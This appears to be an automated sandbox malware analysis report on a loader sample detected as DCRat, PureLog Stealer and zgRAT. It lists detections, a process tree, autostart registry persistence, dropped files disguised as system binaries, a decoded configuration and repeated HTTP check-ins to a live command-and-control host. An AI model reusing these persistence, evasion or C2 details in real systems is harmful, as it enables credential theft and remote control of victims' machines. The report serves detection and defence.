Windows Analysis Report
loader.exe

Overview

General Information

Sample name: loader.exe
Analysis ID: 1588885
MD5: 2307ca04c2633d28345fb0580c77c2ec
SHA1: edbd1f092ed03cb2674877aba6e874722ee07814
SHA256: 168637ea64d64afefd1f88b91ffecb74715ccb6a98acf73d4a16175511628276
Tags: DCRat, exe, NyashTeam, user-MalHunter

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • loader.exe (PID: 6104 cmdline: "C:\Users\user\Desktop\loader.exe" MD5: 2307CA04C2633D28345FB0580C77C2EC)
    • wscript.exe (PID: 3960 cmdline: "C:\Windows\System32\WScript.exe" "C:\ServerWinRuntimeBroker\OAKCwEsKnudXsAgphVRYMDBaoP2ZIjCO6J5QYyd0q81GMNjCqOkwlC1.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 2056 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ServerWinRuntimeBroker\wJc3A8cK4hSMmtCgCMOA49.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chainPorthostCommon.exe (PID: 2308 cmdline: "C:\ServerWinRuntimeBroker/chainPorthostCommon.exe" MD5: CF5B49706562BA2047CDA4A451DD573A)
          • csc.exe (PID: 1484 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 4828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 828 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF2D.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E4D641D33A148FC98C6B9EA6A6669B1.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • csc.exe (PID: 6880 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d135vvi0\d135vvi0.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 4232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 5980 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC121.tmp" "c:\Windows\System32\CSCE59377155588453BA4975E271891CFF.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • cmd.exe (PID: 5236 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HArqwkOZhw.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 5648 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 3384 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • RuntimeBroker.exe (PID: 6008 cmdline: "C:\Windows\LiveKernelReports\RuntimeBroker.exe" MD5: CF5B49706562BA2047CDA4A451DD573A)
  • dasHost.exe (PID: 3404 cmdline: "C:\Windows\DiagTrack\Scenarios\dasHost.exe" MD5: CF5B49706562BA2047CDA4A451DD573A)
  • conhost.exe (PID: 1488 cmdline: "C:\Recovery\conhost.exe" MD5: CF5B49706562BA2047CDA4A451DD573A)
  • tQESKTdysPpsVzUyXTE.exe (PID: 2360 cmdline: "C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe" MD5: CF5B49706562BA2047CDA4A451DD573A)
  • chainPorthostCommon.exe (PID: 2884 cmdline: "C:\ServerWinRuntimeBroker\chainPorthostCommon.exe" MD5: CF5B49706562BA2047CDA4A451DD573A)
  • dasHost.exe (PID: 5872 cmdline: "C:\Windows\DiagTrack\Scenarios\dasHost.exe" MD5: CF5B49706562BA2047CDA4A451DD573A)
  • conhost.exe (PID: 4024 cmdline: "C:\Recovery\conhost.exe" MD5: CF5B49706562BA2047CDA4A451DD573A)
  • tQESKTdysPpsVzUyXTE.exe (PID: 5132 cmdline: "C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe" MD5: CF5B49706562BA2047CDA4A451DD573A)
  • cleanup
{"C2 url": "http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary", "MUTEX": "DCR_MUTEX-eaeo9JEo1ruqi45TCDYM", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| loader.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |
| loader.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |

| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| C:\Windows\DiagTrack\Scenarios\dasHost.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |
| C:\Windows\DiagTrack\Scenarios\dasHost.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| C:\ServerWinRuntimeBroker\chainPorthostCommon.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |
| C:\ServerWinRuntimeBroker\chainPorthostCommon.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| C:\Program Files (x86)\Microsoft\csrss.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |

| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| 00000011.00000002.3435800974.0000000003CBC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | |
| 00000000.00000003.2162490833.0000000005BE3000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 00000000.00000003.2161189771.0000000007387000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 00000011.00000002.3435800974.00000000037B4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security | |
| 00000005.00000000.2286038382.00000000004B2000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |

| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| 0.3.loader.exe.5d2d70d.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |
| 0.3.loader.exe.5d2d70d.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 0.3.loader.exe.74d170d.0.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |
| 0.3.loader.exe.74d170d.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | |
| 5.0.chainPorthostCommon.exe.4b0000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security | |

System Summary

Source: File created, Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, ProcessId: 2308, TargetFilename: C:\Recovery\conhost.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Windows\LiveKernelReports\RuntimeBroker.exe" , CommandLine: "C:\Windows\LiveKernelReports\RuntimeBroker.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\LiveKernelReports\RuntimeBroker.exe, NewProcessName: C:\Windows\LiveKernelReports\RuntimeBroker.exe, OriginalFileName: C:\Windows\LiveKernelReports\RuntimeBroker.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HArqwkOZhw.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5236, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\LiveKernelReports\RuntimeBroker.exe" , ProcessId: 6008, ProcessName: RuntimeBroker.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\LiveKernelReports\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, ProcessId: 2308, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Windows\LiveKernelReports\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, ProcessId: 2308, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started, Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\ServerWinRuntimeBroker/chainPorthostCommon.exe", ParentImage: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, ParentProcessId: 2308, ParentProcessName: chainPorthostCommon.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline", ProcessId: 1484, ProcessName: csc.exe
Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ServerWinRuntimeBroker\OAKCwEsKnudXsAgphVRYMDBaoP2ZIjCO6J5QYyd0q81GMNjCqOkwlC1.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ServerWinRuntimeBroker\OAKCwEsKnudXsAgphVRYMDBaoP2ZIjCO6J5QYyd0q81GMNjCqOkwlC1.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\loader.exe", ParentImage: C:\Users\user\Desktop\loader.exe, ParentProcessId: 6104, ParentProcessName: loader.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ServerWinRuntimeBroker\OAKCwEsKnudXsAgphVRYMDBaoP2ZIjCO6J5QYyd0q81GMNjCqOkwlC1.vbe" , ProcessId: 3960, ProcessName: wscript.exe
Source: File created, Author: frack113: Data: EventID: 11, Image: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, ProcessId: 2308, TargetFilename: C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline

Data Obfuscation

Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\ServerWinRuntimeBroker/chainPorthostCommon.exe", ParentImage: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, ParentProcessId: 2308, ParentProcessName: chainPorthostCommon.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline", ProcessId: 1484, ProcessName: csc.exe

| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| 2025-01-11T06:43:15.910693+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.6 | 56905 | 37.44.238.250 | 80 | TCP |


AV Detection

Source: loader.exe, Avira: detected
Source: C:\Users\user\Desktop\SSuSBQke.log, Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\JgiUHXBa.log, Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\pOvooSqL.log, Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\ServerWinRuntimeBroker\OAKCwEsKnudXsAgphVRYMDBaoP2ZIjCO6J5QYyd0q81GMNjCqOkwlC1.vbe, Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Windows\DiagTrack\Scenarios\dasHost.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\HArqwkOZhw.bat, Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Recovery\conhost.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Microsoft\csrss.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\keVXUmFt.log, Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: 00000005.00000002.2357344463.0000000012B88000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: DCRat {"C2 url": "http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary", "MUTEX": "DCR_MUTEX-eaeo9JEo1ruqi45TCDYM", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: C:\Program Files (x86)\Microsoft\csrss.exe, ReversingLabs: Detection: 82%
Source: C:\Recovery\conhost.exe, ReversingLabs: Detection: 82%
Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, ReversingLabs: Detection: 82%
Source: C:\Users\user\Desktop\BLdnhdFQ.log, ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\JgiUHXBa.log, ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\PHEbWhMM.log, ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\SSuSBQke.log, ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\XCTiUwVw.log, ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\keVXUmFt.log, ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\kmFpzVgz.log, ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\pOvooSqL.log, ReversingLabs: Detection: 50%
Source: C:\Windows\DiagTrack\Scenarios\dasHost.exe, ReversingLabs: Detection: 82%
Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, ReversingLabs: Detection: 82%
Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe, ReversingLabs: Detection: 82%
Source: loader.exe, Virustotal: Detection: 76%
Source: loader.exe, ReversingLabs: Detection: 68%
Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\Desktop\JgiUHXBa.log, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\ZPhRdffT.log, Joe Sandbox ML: detected
Source: C:\Windows\System32\SecurityHealthSystray.exe, Joe Sandbox ML: detected
Source: C:\Windows\DiagTrack\Scenarios\dasHost.exe, Joe Sandbox ML: detected
Source: C:\Recovery\conhost.exe, Joe Sandbox ML: detected
Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\csrss.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\OTzTkTQO.log, Joe Sandbox ML: detected
Source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\keVXUmFt.log, Joe Sandbox ML: detected
Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, Joe Sandbox ML: detected
Source: loader.exe, Joe Sandbox ML: detected
                                    Source: 00000005.00000002.2357344463.0000000012B88000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-eaeo9JEo1ruqi45TCDYM","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                                    Source: 00000005.00000002.2357344463.0000000012B88000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://373292cm.nyashka.top/","JavascriptSecureSqlLocalTemporary"]]
Source: loader.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: loader.exe, loader.exe, 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp
                                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.pdb source: chainPorthostCommon.exe, 00000005.00000002.2352626856.000000000319A000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\d135vvi0\d135vvi0.pdb source: chainPorthostCommon.exe, 00000005.00000002.2352626856.000000000319A000.00000004.00000800.00020000.00000000.sdmp

Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\Users\user\Desktop\loader.exe, Code function: 0_2_0063A69B FindFirstFileW,FindFirstFileW,0_2_0063A69B
Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, File opened: C:\Users\user\AppData
Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, File opened: C:\Users\user\AppData\Local
Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, File opened: C:\Users\user
Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, File opened: C:\Users\user\Documents\desktop.ini
Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, File opened: C:\Users\user\AppData\Local\Temp

Networking

Source: Network traffic, Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:56905 -> 37.44.238.250:80
Source: global traffic, TCP traffic: 192.168.2.6:55549 -> 1.1.1.1:53
Source: Joe Sandbox View, IP Address: 37.44.238.250
Source: Joe Sandbox View, ASN Name: HARMONYHOSTING-ASFR
Source: global traffic, HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 373292cm.nyashka.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 373292cm.nyashka.top | Content-Length: 384 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 373292cm.nyashka.top | Content-Length: 2544 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 373292cm.nyashka.top | Content-Length: 1872 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 373292cm.nyashka.top | Content-Length: 2544 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 373292cm.nyashka.top | Content-Length: 1852 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 373292cm.nyashka.top | Content-Length: 2536 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 373292cm.nyashka.top | Content-Length: 1872 | Expect: 100-continue | Connection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                                    Source: global traffic | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 373292cm.nyashka.top | Content-Length: 1852 | Expect: 100-continue | Connection: Keep-Alive
                                    Source: global traffic | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 373292cm.nyashka.top | Content-Length: 2536 | Expect: 100-continue | Connection: Keep-Alive
                                    Source: global traffic | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 373292cm.nyashka.top | Content-Length: 171160 | Expect: 100-continue | Connection: Keep-Alive
                                    Source: global traffic | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 373292cm.nyashka.top | Content-Length: 2532 | Expect: 100-continue | Connection: Keep-Alive
